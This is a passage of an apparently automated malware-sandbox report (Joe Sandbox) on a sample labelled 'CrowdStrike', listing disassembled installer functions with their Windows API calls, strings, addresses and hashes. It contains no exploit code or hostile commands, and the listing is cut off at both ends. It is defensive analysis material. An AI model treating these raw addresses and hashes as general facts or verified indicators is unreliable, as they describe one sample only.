                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                        • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                        • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                        • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                        • String ID: @rD
                                                                        • API String ID: 184305955-3814967855
                                                                        • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                        • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                        • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                        • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                        Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                        • GetSysColor.USER32(?), ref: 004041AF
                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                        • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                          • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                        • SendMessageW.USER32(00000000), ref: 00404251
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                        • SetCursor.USER32(00000000), ref: 004042D2
                                                                        • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                        • SetCursor.USER32(00000000), ref: 004042F6
                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                        • String ID: @%F$N$open
                                                                        • API String ID: 3928313111-3849437375
                                                                        • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                        • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                        • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                        • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                        Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrcpyW.KERNEL32(0045B2C8,NUL), ref: 00406AA9
                                                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                        • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                        • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                        • wsprintfA.USER32 ref: 00406B4D
                                                                        • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                        • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                        • String ID: F$%s=%s$NUL$[Rename]
                                                                        • API String ID: 565278875-1653569448
                                                                        • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                        • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                        • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                        • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                        • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: F
                                                                        • API String ID: 941294808-1304234792
                                                                        • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                        • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                        • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                        • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                        Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                        • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                        • API String ID: 1641139501-220328614
                                                                        • Opcode ID: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                                                                        • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                        • Opcode Fuzzy Hash: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                                                                        • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                        Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                        Strings
                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                        • String ID: created uninstaller: %d, "%s"
                                                                        • API String ID: 3294113728-3145124454
                                                                        • Opcode ID: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                                                        • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                        • Opcode Fuzzy Hash: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                                                        • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                        Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                        • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 0040619B
                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                        • API String ID: 3734993849-2769509956
                                                                        • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                        • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                        • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                        • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                        Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                        • GetSysColor.USER32(00000000), ref: 00403E00
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                        • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                        • GetSysColor.USER32(?), ref: 00403E2B
                                                                        • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                        • DeleteObject.GDI32(?), ref: 00403E55
                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                        • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                        • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                        • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                        Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                        Strings
                                                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                        • API String ID: 1033533793-945480824
                                                                        • Opcode ID: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                                                        • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                        • Opcode Fuzzy Hash: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                                                        • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                        Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                        • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                        • lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                        • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 2740478559-0
                                                                        • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                        • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                        • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                        • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                        Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
